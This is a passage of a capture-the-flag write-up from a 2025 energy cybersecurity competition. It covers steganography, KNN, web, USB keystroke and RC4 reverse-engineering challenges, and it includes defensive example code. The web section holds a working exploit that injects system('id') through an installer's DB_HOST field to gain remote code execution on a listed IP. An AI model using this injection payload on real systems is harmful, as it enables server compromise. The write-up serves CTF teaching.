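Process the two images by converting their pixels to black-and-white binary values, with 1 representing a black pixel and 0 a white pixel. After trying and analysing several pixel-wise operations, we found that XOR extracts a zip file.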
from PIL import Image


def open_image(image_path):
    """
    Open the image at the given path.
    :param image_path: path of the image file
    :return: the opened image object
    """
    try:
        return Image.open(image_path)
    except FileNotFoundError:
        print(f"错误:未找到图片文件 {image_path}")
        return None


def print_image_dimensions(image):
    """
    Print the width and height of the image.
    :param image: image object
    """
    if image:
        width, height = image.size
        print(f"图片宽度: {width}, 图片高度: {height}")


def convert_image_to_binary(image):
    """
    Convert the image to a binary string: '0' for a white pixel, '1' for a black pixel.
    :param image: image object
    :return: binary string
    """
    binary_string = ""
    if image:
        width, height = image.size
        for y in range(height):
            for x in range(width):
                pixel = image.getpixel((x, y))
                if pixel == 255:
                    binary_string += '0'
                elif pixel == 0:
                    binary_string += '1'
                else:
                    print(f"发现非黑白像素值: {pixel}")
    return binary_string


def binary_string_to_int(binary_str):
    """
    Convert a binary string to an integer.
    :param binary_str: binary string
    :return: the corresponding integer
    """
    return int(binary_str, 2) if binary_str else 0


def write_bytes_to_file(byte_data, file_path):
    """
    Write bytes to the given file.
    :param byte_data: the bytes to write
    :param file_path: file path
    """
    try:
        with open(file_path, 'wb') as file:
            file.write(byte_data)
        print(f"数据已成功写入 {file_path}")
    except Exception as e:
        print(f"写入文件时出错: {e}")


# Open the two images
image_one = open_image("black_white.png")
image_two = open_image("result.png")
# Print the image dimensions
print_image_dimensions(image_one)
print_image_dimensions(image_two)
# Convert each image to a binary string, then to an integer
binary_int_one = binary_string_to_int(convert_image_to_binary(image_one))
binary_int_two = binary_string_to_int(convert_image_to_binary(image_two))
# Print the converted bytes
print(binary_int_one.to_bytes(900, 'big'))
print(binary_int_two.to_bytes(900, 'big'))
# XOR the two values
xor_result = binary_int_one ^ binary_int_two
# Print the bytes of the XOR result
print(xor_result.to_bytes(900, 'big'))
# Write the XOR result to a file
write_bytes_to_file(xor_result.to_bytes(900, 'big'), "out1.zip")
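The code above produces a zip archive. Extracting it gives a file named flag. Change its first two bytes (in hex) to 424D and change the extension to bmp to get an image that resembles a Han Xin code. Place it in the lower-left corner and touch it up in Photoshop to get the image below.
Decode it with an online scanner to obtain the flag:
(2)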

knn

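The challenge description mentions KNN, so use a KNN classification model for prediction.
Use the Python machine-learning module sklearn to classify the data.
Testing showed that the predictions A车 (car A) and B车 (car B) need to be converted to the binary digits 0 and 1 and then decoded as ASCII.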
import pandas as pd
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score

# Load the historical scoring data, specifying GBK encoding
history_data = pd.read_csv('新能源汽车检测数据.csv', encoding='GBK')
# Read the data for the new-energy vehicles to be classified
test_data = pd.read_csv('待检测新能源车.csv', encoding='GBK')
# Extract the features and the target variable
X = history_data[['防碰撞评分', '电池容量评分', '智能驾驶能力', '智能座舱评分']]
y = history_data['名称']
# Split into training and test sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
# Create the KNN classifier; K is set to 10 here and can be adjusted as needed
knn = KNeighborsClassifier(n_neighbors=10)
# Train the model on the training set
knn.fit(X_train, y_train)
# Predict on the test set
y_pred = knn.predict(X_test)
# Compute the model accuracy
accuracy = accuracy_score(y_test, y_pred)
print(f'模型准确率: {accuracy}')
# Extract the features of the vehicles to be classified
test_X = test_data[['防碰撞评分', '电池容量评分', '智能驾驶能力', '智能座舱评分']]
# Predict with the trained model
test_pred = knn.predict(test_X)
# Add the predictions to the vehicle data
test_data['预测车型'] = test_pred
# Save the result as a csv file
csv_path = '待检测新能源车_预测结果.csv'
test_data.to_csv(csv_path, index=False, encoding='utf-8')
df = pd.read_csv(csv_path, encoding='utf-8')
# In the prediction column, replace A车 with 0 and B车 with 1
df['预测车型'] = df['预测车型'].map({'A车': '0', 'B车': '1'})
# Join all values of the prediction column into one string
binary_string = ''.join(df['预测车型'])
# Split the binary string into groups of 8 bits
binary_chunks = [binary_string[i:i + 8] for i in range(0, len(binary_string), 8)]
# Convert each 8-bit group to an ASCII character
ascii_string = ''.join([chr(int(chunk, 2)) for chunk in binary_chunks])
# Print the result
print('转换后的ASCII码字符串为:', ascii_string)
The result is as follows:
One character in the result is a backtick (`), so the model needs tuning: modify KNeighborsClassifier to use n_neighbors=200.
Combining the two outputs and submitting shows that the final result is e0f095bd-16e6-4bf5-a1c5-3dce1d693aa5, so the flag is flag{e0f095bd-16e6-4bf5-a1c5-3dce1d693aa5}.
IV. Web
(1)

This Web Page Is Weird

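The page issues a 302 redirect. Capturing the traffic in Burp reveals a hint to visit yunnuuu.php, which has a weak-type comparison flaw and a file inclusion vulnerability; the file inclusion is used to include the flag file.
Base64-decode the output to get the flag.
(2)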

EasyIntall

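Auditing the code shows few dangerous functions; one file-write sink stands out:
Searching for callers of this function turns up only one, in the third step of the installation.
The argument is read from the cookie and then passed in, so it is controllable, but its data format is not known. The second step shows what it looks like.
So submitting the relevant information to step2 yields the cookie, and code can be injected at any position. The configuration file template is as follows: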
<?php
return array(
    'DB_TYPE'   => '[DB_TYPE]',   // database type
    'DB_HOST'   => '[DB_HOST]',   // server address
    'DB_NAME'   => '[DB_NAME]',   // database name
    'DB_USER'   => '[DB_USER]',   // user name
    'DB_PWD'    => '[DB_PWD]',    // password
    'DB_PORT'   => '[DB_PORT]',   // port
    'DB_PREFIX' => '[DB_PREFIX]', // database table prefix
);
?>
Inject code into the server address field, then request the PHP file location that is returned to complete the RCE. Exploit:
import requests

url = "http://115.29.176.197:23303/install.php?s=/install/step2.html"
data = "db[]=mysqli&db[]=xxx'.system('id').'&db[]=dbname&db[]=root&db[]=123456aA.&db[]=3306&db[]=test_&admin[]=admin&admin[]=123&admin[]=test12&admin[]=test12&admin[][email protected]"
print(requests.post(url, data=data, headers={"Content-Type": "application/x-www-form-urlencoded"}).text)
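The root cause is that a request value is copied into a PHP string literal in the generated config file. As an added example (not the application's code, which the write-up shows only as screenshots), the Python model below renders two lines of the template three ways: raw copy, escaped for a single-quoted PHP literal, and validated then escaped. Plain placeholder replacement by the installer is an assumption, and render, php_single_quote, render_safe and code_outside_literals are illustrative names.

```python
import re

# Two lines of the write-up's config template; raw placeholder replacement by the
# installer is an assumption inferred from the injection described above.
TEMPLATE = "<?php\nreturn array(\n    'DB_HOST' => '[DB_HOST]',\n    'DB_PORT' => '[DB_PORT]',\n);\n"
HOST_RE = re.compile(r"(?=.{1,253}\Z)[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\Z")

def render(values, escape=lambda v: v):
    """Fill every [KEY] placeholder in one pass; the default is the unsafe raw copy."""
    return re.sub(r"\[([A-Z_]+)\]", lambda m: escape(values[m.group(1)]), TEMPLATE)

def php_single_quote(value):
    """Escape for a PHP single-quoted literal, where only \\ and ' are special."""
    return value.replace("\\", "\\\\").replace("'", "\\'")

def render_safe(values):
    """Validate each field against its expected type, then escape what is written."""
    if not HOST_RE.match(values["DB_HOST"]):
        raise ValueError("DB_HOST is not a host name or IPv4 address")
    port = values["DB_PORT"]
    if not re.fullmatch(r"[0-9]{1,5}", port) or not 0 < int(port) < 65536:
        raise ValueError("DB_PORT is not a TCP port")
    return render(values, php_single_quote)

def code_outside_literals(src):
    """Return the PHP source text that lies outside single-quoted string literals."""
    out, i, in_str = [], 0, False
    while i < len(src):
        ch = src[i]
        if in_str and ch == "\\" and src[i + 1:i + 2] in ("'", "\\"):
            i += 2  # escaped quote or backslash: still inside the literal
            continue
        if ch == "'":
            in_str = not in_str
        elif not in_str:
            out.append(ch)
        i += 1
    return "".join(out)

# DB_HOST value as submitted in the write-up's request; GOOD is a constructed benign input.
INJECTED = {"DB_HOST": "xxx'.system('id').'", "DB_PORT": "3306"}
GOOD = {"DB_HOST": "db.internal", "DB_PORT": "3306"}
```

With the raw copy, part of the submitted value ends up outside any string literal, which is what code_outside_literals reports; after escaping, everything submitted stays inside the literal, and validation rejects the value before it is written at all.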
V. Energy Industry
(1)

usb

Extract the data:
# Mapping from USB HID keyboard usage codes to characters
# (codes follow the keyboard page of the HID Usage Tables)
KEYCODE_MAP = {
    0x04: 'a', 0x05: 'b', 0x06: 'c', 0x07: 'd', 0x08: 'e', 0x09: 'f', 0x0A: 'g', 0x0B: 'h',
    0x0C: 'i', 0x0D: 'j', 0x0E: 'k', 0x0F: 'l', 0x10: 'm', 0x11: 'n', 0x12: 'o', 0x13: 'p',
    0x14: 'q', 0x15: 'r', 0x16: 's', 0x17: 't', 0x18: 'u', 0x19: 'v', 0x1A: 'w', 0x1B: 'x',
    0x1C: 'y', 0x1D: 'z', 0x1E: '1', 0x1F: '2', 0x20: '3', 0x21: '4', 0x22: '5', 0x23: '6',
    0x24: '7', 0x25: '8', 0x26: '9', 0x27: '0', 0x28: '\n', 0x29: 'Escape', 0x2A: 'Backspace',
    0x2B: 'Tab', 0x2C: ' ', 0x2D: '-', 0x2E: '=', 0x2F: '[', 0x30: ']', 0x31: '\\',
    0x32: 'Non-US # and ~', 0x33: ';', 0x34: '\'', 0x35: '`', 0x36: ',', 0x37: '.', 0x38: '/',
    0x39: 'Caps Lock', 0x3A: 'F1', 0x3B: 'F2', 0x3C: 'F3', 0x3D: 'F4', 0x3E: 'F5', 0x3F: 'F6',
    0x40: 'F7', 0x41: 'F8', 0x42: 'F9', 0x43: 'F10', 0x44: 'F11', 0x45: 'F12',
    0x46: 'Print Screen', 0x47: 'Scroll Lock', 0x48: 'Pause', 0x49: 'Insert', 0x4A: 'Home',
    0x4B: 'Page Up', 0x4C: 'Delete', 0x4D: 'End', 0x4E: 'Page Down', 0x4F: 'Right Arrow',
    0x50: 'Left Arrow', 0x51: 'Down Arrow', 0x52: 'Up Arrow', 0x53: 'Num Lock',
    0x54: 'Keypad /', 0x55: 'Keypad *', 0x56: 'Keypad -', 0x57: 'Keypad +', 0x58: 'Keypad Enter',
    0x59: 'Keypad 1', 0x5A: 'Keypad 2', 0x5B: 'Keypad 3', 0x5C: 'Keypad 4', 0x5D: 'Keypad 5',
    0x5E: 'Keypad 6', 0x5F: 'Keypad 7', 0x60: 'Keypad 8', 0x61: 'Keypad 9', 0x62: 'Keypad 0',
    0x63: 'Keypad .', 0x64: 'Non-US \\ and |', 0x65: 'Application', 0x66: 'Power',
    0x67: 'Keypad =', 0x68: 'F13', 0x69: 'F14', 0x6A: 'F15', 0x6B: 'F16', 0x6C: 'F17',
    0x6D: 'F18', 0x6E: 'F19', 0x6F: 'F20', 0x70: 'F21', 0x71: 'F22', 0x72: 'F23', 0x73: 'F24',
    0x74: 'Execute', 0x75: 'Help', 0x76: 'Menu', 0x77: 'Select', 0x78: 'Stop', 0x79: 'Again',
    0x7A: 'Undo', 0x7B: 'Cut', 0x7C: 'Copy', 0x7D: 'Paste', 0x7E: 'Find', 0x7F: 'Mute',
    0x80: 'Volume Up', 0x81: 'Volume Down'
}


def decode_usb_keyboard_data(data):
    """
    Decode USB keyboard data.
    :param data: USB keyboard data as a hexadecimal string
    :return: list of decoded key names
    """
    try:
        # Convert the hexadecimal string to bytes
        bytes_data = bytes.fromhex(data.replace(" ", ""))
        keys = []
        # Key codes start at byte index 2 (after the modifier and reserved bytes)
        for i in range(2, len(bytes_data)):
            keycode = bytes_data[i]
            if keycode in KEYCODE_MAP:
                keys.append(KEYCODE_MAP[keycode])
        return keys
    except ValueError:
        print("输入的不是有效的十六进制字符串")
        return []


if __name__ == "__main__":
    try:
        with open('out.txt', 'r') as file:
            for line in file:
                line = line.strip()
                decoded_keys = decode_usb_keyboard_data(line)
                print(f"解码行数据 '{line}' 的按键信息:", decoded_keys)
    except FileNotFoundError:
        print("文件 out.txt 不存在")
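The script above lists the key codes of every report but ignores the modifier byte and repeats a key for as long as it is held. As an added example (not part of the original write-up), the decoder below reads each 8-byte boot-keyboard report in full: it applies Shift and Caps Lock, acts on Backspace, and counts a key only in the report where it first appears. The report lines in SAMPLE are constructed.

```python
# Printable keys from the HID Usage Tables keyboard page, as (unshifted, shifted) runs.
ROWS = {0x04: ("abcdefghijklmnopqrstuvwxyz", "ABCDEFGHIJKLMNOPQRSTUVWXYZ"),
        0x1E: ("1234567890", "!@#$%^&*()"),
        0x2C: (" -=[]\\", " _+{}|"),
        0x33: (";'`,./", ":\"~<>?")}
KEYS = {base + i: (lo[i], hi[i])
        for base, (lo, hi) in ROWS.items() for i in range(len(lo))}
ENTER, BACKSPACE, CAPS_LOCK = 0x28, 0x2A, 0x39
SHIFT_BITS = 0x22  # modifier byte: bit 1 = left Shift, bit 5 = right Shift


def decode_reports(lines):
    """Rebuild the typed text from 8-byte boot-keyboard reports given as hex strings."""
    text, held, caps = [], set(), False
    for line in lines:
        raw = bytes.fromhex(line.strip().replace(":", ""))
        if len(raw) != 8:
            continue  # not a boot-protocol keyboard report
        codes = {c for c in raw[2:] if c > 0x03}  # 0x00 = empty slot, 0x01-0x03 = errors
        for code in raw[2:]:
            if code not in codes or code in held:
                continue  # nothing new: empty slot, error code, or key still held
            if code == BACKSPACE:
                if text:
                    text.pop()
            elif code == ENTER:
                text.append("\n")
            elif code == CAPS_LOCK:
                caps = not caps
            elif code in KEYS:
                shifted = bool(raw[0] & SHIFT_BITS)
                if 0x04 <= code <= 0x1D:  # Caps Lock inverts Shift for letters only
                    shifted ^= caps
                text.append(KEYS[code][shifted])
        held = codes
    return "".join(text)


# Constructed capture: "f" held across two reports, Shift+[ and right-Shift+a,
# then a mistyped "x" removed with Backspace before "b" and Shift+].
SAMPLE = ["0000090000000000", "0000090000000000", "0000000000000000",
          "00000f0000000000", "0000000000000000", "0000040000000000",
          "0000000000000000", "00000a0000000000", "0000000000000000",
          "0200000000000000", "02002f0000000000", "0000000000000000",
          "2000040000000000", "0000000000000000", "00001b0000000000",
          "0000000000000000", "00002a0000000000", "0000000000000000",
          "0000050000000000", "0000000000000000", "0200300000000000",
          "0000000000000000"]
```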
(2)

Lava

Running strings shows that the binary is packed with a modified UPX 3.95:
Inspecting the signatures in 010 Editor shows that the following locations were modified:
After fixing them, save the file as lavatk; UPX 3.95 can then unpack it.
The core logic is as follows:
The figure below shows the characteristic features of the RC4 algorithm.
The algorithm has been modified, so take a C RC4 template and make the following small changes.
#include <stdio.h>

unsigned char S_Box[256] = { 0 };

// RC4 initial
// (modified key schedule: additions replace the usual swap)
void Init(unsigned char* key, int keyLen)
{
    unsigned char T[256] = { 0 };
    for (int i = 0; i < 256; i++) {
        S_Box[i] = i;
        T[i] = key[i % keyLen];
    }
    int j = 0;
    for (int i = 0; i < 256; i++) {
        j = (j + S_Box[i] + T[i]) % 256;
        unsigned char tmp = S_Box[i];
        S_Box[i] += S_Box[j];
        S_Box[j] += tmp;
    }
    return;
}

// RC4 Encryption and Decryption (The same)
// (modified output step: the keystream byte is added to the data instead of XORed)
void RC4(unsigned char* key, int keyLen, unsigned char* data, int dataLen)
{
    Init(key, keyLen);
    int i = 0, j = 0;
    for (int k = 0; k < dataLen; k++) {
        i = (i + 1) % 256;
        j = (j + S_Box[i]) % 256;
        unsigned char tmp = S_Box[i];
        S_Box[i] = S_Box[j];
        S_Box[j] = tmp;
        data[k] += S_Box[(S_Box[i] + S_Box[j]) % 256];
    }
}

// Hex to Char
const char HexChar[16] = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f' };

void hex2char(unsigned char* hex, unsigned char* chr, int hexLen)
{
    int lastIdx = 0;
    for (int i = 0; i < hexLen; i++) {
        int index = 0;
        for (index = 0; index < 16; index++) {
            if (HexChar[index] == hex[i]) {
                break;
            }
        }
        if (index == 16) {
            printf("Please check your hex string at POSITION [%d] again.\n", i);
            return;
        }
        if (i & 1) chr[i / 2] = lastIdx * 16 + index;
        else lastIdx = index;
    }
    return;
}

int main()
{
    unsigned char key_hex[] = "726334497345617379";
    unsigned char data_hex[] = "643ad079b9e975526ee9fb0e52241cb62be486f86952533e3c8eb01662e6987f";
    int keyLen = 9, dataLen = 32;
    unsigned char key[10] = { 0 };
    unsigned char data[33] = { 0 };
    hex2char(key_hex, key, keyLen * 2);
    hex2char(data_hex, data, dataLen * 2);
    RC4(key, keyLen, data, dataLen);
    printf("\n[*]RC4 Encrypt/Decrypt result: ");
    printf("\n%s", data);
    return 0;
}
The test output is as follows:
This gives flag{2404c9b8af2dd18f92dd9018c85f76fe}.
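Hillstone Networks (山石网科) is a leading technology-innovation vendor in China's network security industry. It was founded in 2007 by a group of well-known network security engineers and, as one of the first network security companies to do so, listed on the STAR Market in September 2019 (stock name: 山石网科; stock code: 688030).
Hillstone Networks currently holds 30 self-developed core technologies and has applied for more than 560 patents in China and abroad. Since 2019 it has been actively investing in the Xinchuang (information technology application innovation) field, committed to promoting domestic information technology innovation, and in 2021 it formally launched its security chip strategy. In 2023 it carried out research and development on a self-developed ASIC security chip, aiming to provide users with more efficient and more secure network protection through independent innovation. Hillstone Networks has now built complete solutions for more than 50 industries and scenarios, with products and services in nine categories (infrastructure security, cloud security, data security, application security, security operations, industrial internet security, information technology application innovation, security services and security education) that share four technical traits: "holographic, quantified, intelligent and collaborative".

Originally published on the WeChat official account 山石网科安全技术研究院 (Hillstone Networks Security Technology Research Institute): 2025 Energy Cybersecurity Competition Team Preliminary Round (Public Division) Write-up

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided for security research and teaching only. Readers who put this information to other uses bear all legal and joint liability; this site bears none. If you have questions, contact us by e-mail (a corporate or otherwise valid mailbox is recommended so that the message is not blocked; contact details are on the home page).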
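  • Posted on April 23, 2025 at 17:56:52
  • Please keep the link to this article when reposting (CN-SEC中文网: thanks to the original author for their hard work):
    2025 Energy Cybersecurity Competition Team Preliminary Round (Public Division) Write-up: https://cn-sec.com/archives/3990683.html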